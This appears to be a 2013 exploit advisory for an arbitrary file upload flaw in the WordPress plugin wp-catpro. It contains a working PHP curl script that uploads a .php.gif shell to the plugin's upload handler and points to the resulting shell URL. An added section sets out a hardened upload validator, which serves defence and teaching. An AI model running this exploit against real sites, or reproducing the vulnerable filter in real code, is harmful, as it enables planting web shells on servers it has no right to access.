WordPress plugin wp-catpro arbitrary file upload

Posted on 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7, Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif:
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>
<?php
phpinfo();
?>
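Added example (not from the post or the wp-catpro plugin): the naive last-extension check the advisory describes placed beside a hardened upload validator, showing why zik.php.gif passes the original filter and how a handler should reject it. Function names, the constant list and the fixed upload directory are assumptions.

```php
<?php
// Added example, not the plugin's code. Contrasts the advisory's
// "allowed extensions" check (only the final extension is tested) with a
// hardened handler. Names and paths below are hypothetical.

const ALLOWED_EXT = ['jpg', 'gif', 'png'];
const UPLOAD_DIR  = __DIR__ . '/uploads/catpro'; // fixed server-side; the 'folder' POST field is never used

// Naive check as described in the advisory: "zik.php.gif" -> "gif" -> accepted,
// and the file is stored under its original double-extension name.
function naive_is_allowed(string $name): bool {
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Hardened check: one extension only, image bytes verified by content, and the
// stored extension derived from the detected type rather than the client name.
function hardened_validate(string $name, string $tmpPath): ?string {
    $base = basename($name);
    if (substr_count($base, '.') !== 1) {          // "zik.php.gif" is rejected here
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $info = @getimagesize($tmpPath);                 // inspects the bytes, not the name
    if ($info === false) {
        return null;
    }
    $byType = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif', IMAGETYPE_PNG => 'png'];
    return $byType[$info[2]] ?? null;
}

function store_upload(array $file): ?string {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = hardened_validate($file['name'], $file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    // Server-chosen random name: the client never controls the stored filename.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Usage in the handler: $stored = store_upload($_FILES['Filedata']);
```

The upload directory should additionally be configured so the web server never executes scripts stored in it, so that even a polyglot image that passes content checks is served as a static file.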